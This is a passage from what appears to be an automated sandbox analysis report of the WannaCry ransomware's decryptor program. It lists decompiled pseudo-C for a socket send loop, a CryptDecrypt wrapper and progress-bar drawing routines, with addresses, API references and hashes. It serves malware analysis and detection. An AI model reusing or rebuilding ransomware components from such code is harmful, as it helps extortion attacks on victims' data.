									_t104 = _a4;
									_t78 = _t105 >> 2;
									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
									_t106 =  &(( &_v1040)[6]);
									_t83 =  &_v1024;
									_t91 = _t83;
									_v1040 = _t83;
									E0040D2B0(_t60, _t91, _t105);
									goto L13;
								}
							} else {
								_t91 = _a4;
								E0040D2B0(__ecx, _t91, _t105);
								L13:
								_push( &_v1028);
								L0041303E();
								_t37 = _v1028;
								_t107 =  &(_t106[1]);
								_t102 = 0;
								_v1036 = _t37;
								__eflags = _t105;
								if(_t105 > 0) {
									while(1) {
										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
											goto L25;
										}
										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
										__eflags = _t43;
										if(__eflags > 0) {
											_t102 = _t102 + _t43;
											__eflags = _t102;
											_push( &_v1048);
											goto L24;
										} else {
											if(__eflags != 0) {
												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
												__eflags = _t45 - 0x2733;
												if(_t45 == 0x2733) {
													_t46 = _v1044;
													__eflags = _t46 - 0x64;
													_v1044 = _t46 + 1;
													if(_t46 > 0x64) {
														Sleep(0x64);
														_v1044 = 0;
													}
													_push( &_v1048);
													L24:
													L0041303E();
													_t107 =  &(_t107[1]);
													__eflags = _t102 - _t105;
													if(_t102 < _t105) {
														_t37 = _v1048;
														continue;
													}
												}
											}
										}
										goto L25;
									}
								}
								L25:
								__eflags = _t91 - _a4;
								if(_t91 != _a4) {
									__eflags = _t91 -  &_v1024;
									if(_t91 !=  &_v1024) {
										__eflags = _t91;
										if(_t91 != 0) {
											free(_t91);
										}
									}
								}
								return _t102;
							}
						}
					} else {
						_t58 = _t34 | 0xffffffff;
						__eflags = _t58;
						return _t58;
					}
				} else {
					return 0;
				}
			}






























                                                      0x0040d300
                                                      0x0040d308
                                                      0x0040d313
                                                      0x0040d315
                                                      0x0040d31d
                                                      0x0040d330
                                                      0x0040d335
                                                      0x0040d337
                                                      0x0040d350
                                                      0x0040d352
                                                      0x0040d3f6
                                                      0x0040d3fd
                                                      0x0040d401
                                                      0x00000000
                                                      0x0040d358
                                                      0x0040d35f
                                                      0x0040d361
                                                      0x0040d378
                                                      0x0040d37e
                                                      0x0040d3b1
                                                      0x0040d3b6
                                                      0x0040d3b9
                                                      0x0040d3bd
                                                      0x0040d3bf
                                                      0x0040d3ce
                                                      0x0040d3d5
                                                      0x0040d3db
                                                      0x0040d3de
                                                      0x0040d3e6
                                                      0x0040d3e6
                                                      0x0040d3e8
                                                      0x0040d3ef
                                                      0x00000000
                                                      0x0040d3cb
                                                      0x0040d3cb
                                                      0x0040d3cb
                                                      0x0040d380
                                                      0x0040d380
                                                      0x0040d38f
                                                      0x0040d39a
                                                      0x0040d39a
                                                      0x0040d39c
                                                      0x0040d3a0
                                                      0x0040d3a2
                                                      0x0040d3a9
                                                      0x00000000
                                                      0x0040d3a9
                                                      0x0040d363
                                                      0x0040d363
                                                      0x0040d36e
                                                      0x0040d403
                                                      0x0040d407
                                                      0x0040d408
                                                      0x0040d40d
                                                      0x0040d411
                                                      0x0040d414
                                                      0x0040d416
                                                      0x0040d41a
                                                      0x0040d41c
                                                      0x0040d424
                                                      0x0040d42d
                                                      0x0040d42f
                                                      0x00000000
                                                      0x00000000
                                                      0x0040d442
                                                      0x0040d445
                                                      0x0040d447
                                                      0x0040d480
                                                      0x0040d480
                                                      0x0040d486
                                                      0x00000000
                                                      0x0040d449
                                                      0x0040d449
                                                      0x0040d44f
                                                      0x0040d452
                                                      0x0040d457
                                                      0x0040d459
                                                      0x0040d460
                                                      0x0040d463
                                                      0x0040d467
                                                      0x0040d46b
                                                      0x0040d471
                                                      0x0040d471
                                                      0x0040d47d
                                                      0x0040d487
                                                      0x0040d487
                                                      0x0040d48c
                                                      0x0040d48f
                                                      0x0040d491
                                                      0x0040d420
                                                      0x00000000
                                                      0x0040d420
                                                      0x0040d491
                                                      0x0040d457
                                                      0x0040d449
                                                      0x00000000
                                                      0x0040d447
                                                      0x0040d424
                                                      0x0040d493
                                                      0x0040d493
                                                      0x0040d49a
                                                      0x0040d4a0
                                                      0x0040d4a2
                                                      0x0040d4a4
                                                      0x0040d4a6
                                                      0x0040d4a9
                                                      0x0040d4ae
                                                      0x0040d4a6
                                                      0x0040d4a2
                                                      0x0040d4bd
                                                      0x0040d4bd
                                                      0x0040d361
                                                      0x0040d33c
                                                      0x0040d33c
                                                      0x0040d33c
                                                      0x0040d346
                                                      0x0040d346
                                                      0x0040d322
                                                      0x0040d32b
                                                      0x0040d32b

                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                                      • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                                      • Opcode Fuzzy Hash: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                                      • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404AF0 Relevance: 6.1, APIs: 4, Instructions: 51encryptionCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E00404AF0(void* __ecx, void* _a4, int _a8) {
				intOrPtr* _v4;
				void* _v8;
				signed int _v12;
				int _t12;
				void* _t19;
				signed int _t22;
				signed int _t23;
				struct _CRITICAL_SECTION* _t30;
				void* _t36;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					_t2 = _t19 + 0x10; // 0x14
					_t30 = _t2;
					EnterCriticalSection(_t30);
					_t36 = _a4;
					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
					_push(_t30);
					if(_t12 != 0) {
						LeaveCriticalSection();
						_t22 = _v12;
						_t23 = _t22 >> 2;
						memcpy(_v8, _t36, _t23 << 2);
						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
						return 1;
					} else {
						LeaveCriticalSection();
						return 0;
					}
				} else {
					return 0;
				}
			}












                                                      0x00404af1
                                                      0x00404afa
                                                      0x00404b04
                                                      0x00404b04
                                                      0x00404b08
                                                      0x00404b0e
                                                      0x00404b22
                                                      0x00404b2a
                                                      0x00404b2b
                                                      0x00404b3b
                                                      0x00404b49
                                                      0x00404b4d
                                                      0x00404b50
                                                      0x00404b60
                                                      0x00404b67
                                                      0x00404b2d
                                                      0x00404b2d
                                                      0x00404b38
                                                      0x00404b38
                                                      0x00404afe
                                                      0x00404b01
                                                      0x00404b01

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                                      • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CryptDecryptEnterLeave
                                                      • String ID:
                                                      • API String ID: 1395129968-0
                                                      • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                                      • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004090F0 Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E004090F0(intOrPtr* __ecx, void* __fp0) {
				signed int _t226;
				signed int _t230;
				struct tagPOINT _t232;
				long _t233;
				signed int _t237;
				signed int _t242;
				intOrPtr _t246;
				intOrPtr* _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t276;
				intOrPtr _t279;
				signed int _t282;
				intOrPtr* _t283;
				struct tagPOINT _t295;
				signed int _t311;
				signed int _t314;
				signed int** _t321;
				intOrPtr _t361;
				intOrPtr _t418;
				intOrPtr* _t429;
				signed int* _t433;
				long _t437;
				signed int _t438;
				intOrPtr* _t440;
				signed int _t441;
				intOrPtr _t442;
				void* _t443;

				_push(0xffffffff);
				_push(E0041414D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t442;
				_t443 = _t442 - 0xc4;
				_t321 =  *(_t443 + 0xd8);
				_t226 = _t321[1];
				_t429 = __ecx;
				if((_t226 & 0x00000003) == 0) {
					L49:
					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
					return _t226;
				}
				_t433 =  *_t321;
				 *(_t443 + 0x40) = _t226 & 0x00000004;
				 *(_t443 + 0x10) = 0;
				L00412DA6();
				_push(_t443 + 0x14);
				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
				L00412DD6();
				_t230 = _t321[1] & 0x00000300;
				if(_t230 == 0x100) {
					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
						_push("%d%%");
						L00412DA0();
					}
					_t232 = _t321[7];
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
					asm("fild dword [esp+0x28]");
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
					asm("fidiv dword [esp+0x28]");
					L0041304A();
					 *(_t443 + 0x10) = _t232;
				} else {
					if(_t230 == 0x200) {
						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
							_push("%d");
							L00412DA0();
						}
						 *(_t443 + 0x10) = _t321[6];
					}
				}
				_t226 =  *(_t443 + 0x14);
				if( *((intOrPtr*)(_t226 - 8)) == 0) {
					L48:
					 *(_t443 + 0xdc) = 0xffffffff;
					L00412CC2();
					goto L49;
				} else {
					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
					L00412DE2();
					_t437 = _t233;
					 *(_t443 + 0x54) = _t433;
					 *(_t443 + 0x50) = 0x416794;
					 *(_t443 + 0xdc) = 1;
					E00409DF0(_t443 + 0x58);
					 *(_t443 + 0x58) = 0x416780;
					 *((char*)(_t443 + 0xe0)) = 2;
					 *(_t443 + 0x64) = 0;
					 *(_t443 + 0x54) = 0x41677c;
					E00409870(_t443 + 0x54, _t437);
					 *(_t443 + 0x68) = _t433;
					 *((char*)(_t443 + 0xe0)) = 4;
					 *(_t443 + 0x70) = 0xffffffff;
					 *(_t443 + 0x68) = 0x416778;
					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
					 *(_t443 + 0x90) = _t237;
					 *(_t443 + 0x6c) = _t237;
					 *(_t443 + 0x88) = _t433;
					_push(1);
					 *((char*)(_t443 + 0xe0)) = 6;
					 *(_t443 + 0x90) = 0;
					 *(_t443 + 0x88) = 0x416774;
					L00412DC4();
					 *(_t443 + 0x70) = _t237;
					 *(_t443 + 0x8c) = _t237;
					 *(_t443 + 0x7c) = _t433;
					_push(0xe);
					 *((char*)(_t443 + 0xe0)) = 8;
					 *(_t443 + 0x84) = 0xffffffff;
					 *(_t443 + 0x7c) = 0x416770;
					L00413004();
					 *(_t443 + 0x74) = _t237;
					 *(_t443 + 0x80) = _t237;
					 *((char*)(_t443 + 0xe4)) = 9;
					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
					L00412DA6();
					_push( *(_t443 + 0x10));
					_push( *(_t443 + 0x14));
					_push(_t443 + 0x1c);
					 *((char*)(_t443 + 0xe8)) = 0xa;
					L00412E00();
					_t443 = _t443 + 0xc;
					_t242 = 0;
					 *((intOrPtr*)(_t443 + 0x28)) = 0;
					if(_t437 != 0) {
						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
						_t242 = 0;
						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
					}
					 *(_t443 + 0x10) = _t242;
					 *(_t443 + 0x2c) = _t242;
					 *(_t443 + 0x24) = _t242;
					_t438 = 0;
					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
					_t246 =  *((intOrPtr*)(_t443 + 0x28));
					if(_t246 != 0) {
						if(_t246 != 0x5a) {
							if(_t246 != 0xb4) {
								if(_t246 != 0x10e) {
									goto L21;
								}
								_t441 =  *(_t443 + 0x20);
								 *(_t443 + 0x10) = _t441;
								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
								_t438 =  ~_t441;
								L20:
								 *(_t443 + 0x24) = 0;
								goto L21;
							}
							_t311 =  *(_t443 + 0x20);
							 *(_t443 + 0x2c) = _t311;
							_t438 = 0;
							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
							 *(_t443 + 0x24) =  ~_t311;
							goto L21;
						}
						_t438 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) = _t438;
						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
						goto L20;
					} else {
						_t314 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
						 *(_t443 + 0x2c) = _t314;
						 *(_t443 + 0x24) = _t314;
						L21:
						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
						if((_t321[1] & 0x00000010) == 0) {
							asm("cdq");
							 *(_t443 + 0x44) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
								_t264 =  *((intOrPtr*)(_t443 + 0xec));
								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
								}
								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x90) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t282;
									}
									_t283 = _t440;
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
								}
								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
									L39:
									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
									 *(_t443 + 0xdc) = 9;
									L00412CC2();
									 *(_t443 + 0x78) = 0x416770;
									_t269 =  *(_t443 + 0x74);
									 *(_t443 + 0xdc) = 0xb;
									if(_t269 != 0xffffffff) {
										_push(_t269);
										L00413004();
									}
									 *(_t443 + 0x84) = 0x416774;
									_t270 =  *(_t443 + 0x70);
									 *(_t443 + 0xdc) = 0xc;
									if(_t270 != 0) {
										_push(_t270);
										L00412DC4();
									}
									 *(_t443 + 0x64) = 0x416778;
									_t271 =  *(_t443 + 0x6c);
									 *(_t443 + 0xdc) = 0xd;
									if(_t271 != 0xffffffff) {
										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
									}
									 *(_t443 + 0x50) = 0x41677c;
									_t272 =  *(_t443 + 0x60);
									 *(_t443 + 0xdc) = 0xf;
									if(_t272 != 0) {
										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
									}
									 *(_t443 + 0x60) = 0;
									L00412D52();
									_t226 = _t443 + 0x58;
									 *(_t443 + 0x58) = 0x415c00;
									 *(_t443 + 0x70) = _t226;
									 *(_t443 + 0xdc) = 0x10;
									L00412D52();
									 *(_t443 + 0x58) = 0x415bec;
									 *(_t443 + 0x50) = 0x416794;
									goto L48;
								} else {
									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x6c) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t276;
									}
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
									_t279 =  *_t429;
									_push(_t443 + 0x48);
									_push(_t443 + 0x18);
									_t361 = _t443 + 0x38;
									L38:
									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
									goto L39;
								}
							}
							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
							goto L39;
						}
						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
						_t295 =  *(_t443 + 0x2c);
						if( *(_t443 + 0x40) == 0) {
							_t295 =  *(_t443 + 0x10);
						}
						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
							goto L39;
						} else {
							asm("cdq");
							_t418 =  *((intOrPtr*)(_t443 + 0x34));
							 *(_t443 + 0x40) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
							_t279 =  *_t429;
							_push(_t443 + 0x48);
							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
							_push(_t443 + 0x18);
							goto L38;
						}
					}
				}
			}

































                                                      0x004090f6
                                                      0x004090f8
                                                      0x004090fd
                                                      0x004090fe
                                                      0x00409105
                                                      0x0040910c
                                                      0x00409115
                                                      0x0040911c
                                                      0x0040911e
                                                      0x0040971e
                                                      0x00409729
                                                      0x00409736
                                                      0x00409736
                                                      0x00409124
                                                      0x0040912f
                                                      0x00409133
                                                      0x00409137
                                                      0x00409142
                                                      0x00409143
                                                      0x0040914a
                                                      0x00409152
                                                      0x0040915c
                                                      0x0040918c
                                                      0x0040918e
                                                      0x00409197
                                                      0x00409197
                                                      0x0040919c
                                                      0x004091a7
                                                      0x004091ad
                                                      0x004091b1
                                                      0x004091bb
                                                      0x004091bf
                                                      0x004091c4
                                                      0x0040915e
                                                      0x00409163
                                                      0x0040916c
                                                      0x0040916e
                                                      0x00409177
                                                      0x00409177
                                                      0x0040917f
                                                      0x0040917f
                                                      0x00409163
                                                      0x004091c8
                                                      0x004091cf
                                                      0x0040970a
                                                      0x0040970e
                                                      0x00409719
                                                      0x00000000
                                                      0x004091d5
                                                      0x004091dd
                                                      0x004091e4
                                                      0x004091e9
                                                      0x004091eb
                                                      0x004091ef
                                                      0x004091fb
                                                      0x00409203
                                                      0x00409208
                                                      0x00409215
                                                      0x0040921d
                                                      0x00409225
                                                      0x0040922d
                                                      0x00409235
                                                      0x0040923e
                                                      0x00409246
                                                      0x0040924e
                                                      0x00409256
                                                      0x00409259
                                                      0x00409260
                                                      0x00409264
                                                      0x0040926b
                                                      0x0040926f
                                                      0x00409277
                                                      0x00409282
                                                      0x0040928d
                                                      0x00409292
                                                      0x00409296
                                                      0x0040929d
                                                      0x004092a1
                                                      0x004092a5
                                                      0x004092ad
                                                      0x004092b8
                                                      0x004092c0
                                                      0x004092c5
                                                      0x004092c9
                                                      0x004092d9
                                                      0x004092e1
                                                      0x004092f3
                                                      0x004092f7
                                                      0x004092fb
                                                      0x00409308
                                                      0x0040930d
                                                      0x0040930e
                                                      0x0040930f
                                                      0x00409317
                                                      0x0040931c
                                                      0x0040931f
                                                      0x00409323
                                                      0x00409327
                                                      0x00409337
                                                      0x00409355
                                                      0x00409357
                                                      0x00409357
                                                      0x0040935b
                                                      0x0040935f
                                                      0x00409363
                                                      0x0040936f
                                                      0x0040937b
                                                      0x00409381
                                                      0x00409389
                                                      0x004093a4
                                                      0x004093bd
                                                      0x004093de
                                                      0x00000000
                                                      0x00000000
                                                      0x004093e0
                                                      0x004093e8
                                                      0x004093ec
                                                      0x004093f0
                                                      0x004093f2
                                                      0x004093f2
                                                      0x00000000
                                                      0x004093f2
                                                      0x004093bf
                                                      0x004093c7
                                                      0x004093cb
                                                      0x004093cf
                                                      0x004093d3
                                                      0x00000000
                                                      0x004093d3
                                                      0x004093a6
                                                      0x004093ae
                                                      0x004093b2
                                                      0x00000000
                                                      0x0040938b
                                                      0x0040938f
                                                      0x00409393
                                                      0x00409397
                                                      0x0040939b
                                                      0x004093f6
                                                      0x004093ff
                                                      0x0040940b
                                                      0x004094b9
                                                      0x004094cc
                                                      0x004094d5
                                                      0x004094e8
                                                      0x004094f3
                                                      0x00409517
                                                      0x00409525
                                                      0x00409537
                                                      0x00409537
                                                      0x0040953d
                                                      0x00409553
                                                      0x0040955d
                                                      0x00409568
                                                      0x0040956a
                                                      0x0040956a
                                                      0x0040956e
                                                      0x00409572
                                                      0x00409579
                                                      0x00409580
                                                      0x0040958e
                                                      0x0040959b
                                                      0x004095ad
                                                      0x004095ad
                                                      0x004095bf
                                                      0x0040961a
                                                      0x0040962d
                                                      0x00409634
                                                      0x0040963c
                                                      0x00409641
                                                      0x00409649
                                                      0x0040964d
                                                      0x00409658
                                                      0x0040965a
                                                      0x0040965d
                                                      0x0040965d
                                                      0x00409662
                                                      0x0040966d
                                                      0x00409671
                                                      0x0040967b
                                                      0x0040967d
                                                      0x00409680
                                                      0x00409680
                                                      0x00409685
                                                      0x0040968d
                                                      0x00409691
                                                      0x0040969c
                                                      0x004096a3
                                                      0x004096a3
                                                      0x004096a6
                                                      0x004096ae
                                                      0x004096b2
                                                      0x004096bc
                                                      0x004096c5
                                                      0x004096c5
                                                      0x004096cc
                                                      0x004096d4
                                                      0x004096d9
                                                      0x004096dd
                                                      0x004096e5
                                                      0x004096ed
                                                      0x004096f5
                                                      0x004096fa
                                                      0x00409702
                                                      0x00000000
                                                      0x004095c1
                                                      0x004095c9
                                                      0x004095d1
                                                      0x004095d3
                                                      0x004095d3
                                                      0x004095e0
                                                      0x004095eb
                                                      0x004095ef
                                                      0x004095fc
                                                      0x00409604
                                                      0x00409608
                                                      0x0040960a
                                                      0x0040960b
                                                      0x0040960c
                                                      0x00409610
                                                      0x00409614
                                                      0x00000000
                                                      0x00409614
                                                      0x004095bf
                                                      0x0040950c
                                                      0x00000000
                                                      0x0040950c
                                                      0x00409421
                                                      0x0040942c
                                                      0x00409430
                                                      0x00409432
                                                      0x00409432
                                                      0x00409444
                                                      0x00000000
                                                      0x0040944a
                                                      0x0040945c
                                                      0x0040945f
                                                      0x00409467
                                                      0x00409478
                                                      0x0040948e
                                                      0x00409491
                                                      0x0040949b
                                                      0x0040949c
                                                      0x004094a3
                                                      0x00000000
                                                      0x004094a3
                                                      0x00409444
                                                      0x00409389

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                                      • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                                      • API String ID: 2923375784-3599407550
                                                      • Opcode ID: 4537b4b5c38f08034835ba6f49b0df8f11378c8c8d7c7bac32dddfd5d0061b5a
                                                      • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                                      • Opcode Fuzzy Hash: 4537b4b5c38f08034835ba6f49b0df8f11378c8c8d7c7bac32dddfd5d0061b5a
                                                      • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405230 Relevance: 49.8, APIs: 33, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E00405230(void* __ecx) {
				RECT* _v12;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				int _t98;
				int _t99;
				int _t104;
				char* _t106;
				void* _t109;
				char* _t110;
				signed int _t113;
				int _t114;
				void* _t117;
				char* _t118;
				char _t119;
				char* _t120;
				signed int _t122;
				void* _t123;
				int _t126;
				int _t127;
				int _t130;
				void* _t132;
				signed int _t136;
				signed int _t142;
				intOrPtr _t163;
				intOrPtr _t179;
				signed int _t182;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t201;
				intOrPtr* _t205;
				void* _t208;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr _t215;

				_push(0xffffffff);
				_push(E00413918);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t208 = __ecx;
				_t182 =  *(__ecx + 0x70);
				if(_t182 != 1) {
					if(__eflags <= 0) {
						L33:
						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
						L34:
						 *[fs:0x0] = _v12;
						return _t98;
					}
					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
					if( *((char*)(__ecx + 0x4b)) != 1) {
						L15:
						_t99 =  *(_t208 + 0x78);
						__eflags = _t99 - 3;
						if(_t99 != 3) {
							__eflags = _t99 - 2;
							if(_t99 != 2) {
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _t99 - 1;
									if(_t99 != 1) {
										goto L33;
									}
									_t212 = _t208 + 0x44;
